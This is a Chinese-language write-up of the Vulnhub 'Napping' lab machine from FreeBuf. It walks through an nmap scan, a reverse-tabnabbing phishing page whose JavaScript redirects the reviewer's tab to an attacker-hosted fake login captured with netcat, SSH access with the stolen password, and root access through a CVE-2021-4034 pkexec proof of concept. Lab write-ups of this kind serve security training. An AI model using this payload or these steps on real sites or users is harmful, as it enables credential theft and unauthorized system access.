freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Vulnhub_Napping
2022-02-22 23:17:02
所属地 陕西省

主机信息

kali:192.168.3.76
napping:192.168.31.47

信息收集

使用Nmap探测目标主机发现开放22、80两个端口

nmap -A -p- 192.168.31.47

image
访问80端口发现是一个登录页和一个注册页
image
image
查看这两个网页的源码没有发现有价值的信息
image
image
尝试注册一个账户,登录后发现存在一个输入框
image
输入后会生成一个超链接点击会进行跳转
image
根据网页的描述,在输入一个网址之后,管理员会进行审核,且这种生成的URL容易存在tabnabbing攻击
image

漏洞利用

首先从真网站下载一个网页

wget http://192.168.31.47/index.php

image
然后再创建一个html文件,写入钓鱼网站的代码(文中该文件名为1.html)

<!DOCTYPE html>
<html>
<body>
    <script>
        if(window.opener) window.opener.parent.location.replace('http://192.168.31.76:8080/index.html');
        if(window.opener  != window) window.opener.parent.location.replace('http://192.168.31.76:8080/index.html');
    </script>
</body>
</html>

然后在网页目录下使用python开启一个http服务,使用nc监听钓鱼网站中使用的端口,在正常网页中填写构造的URL提交后,等待2-3分钟左右,NC就会返回一个用户名和密码
image
使用这个密码登录web界面,发现密码错误
image
然后尝试ssh登录,发现可以登录成功
image
查看daniel用户的家目录没有发现有用的信息
image
然后查看adrian用户家目录下存在三个文件
image
第一个是判断网站是否正常启动,并打印时间
image
这个文件为query.py脚本执行写入的log文件
image
查看user.txt发现没有权限
image

提权

查看系统版本分析该网站可能存在CVE-2021-4034 polkit的pkexec本地权限提升漏洞
image
然后查看gcc是否存在和版本号
image
将cve-2021-4034漏洞的poc下载到服务器后,使用gcc进行编译
image
查看编译后文件
image
执行编译文件获得root权限
image
查看flag
image

# 渗透测试 # 黑客 # 系统安全
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者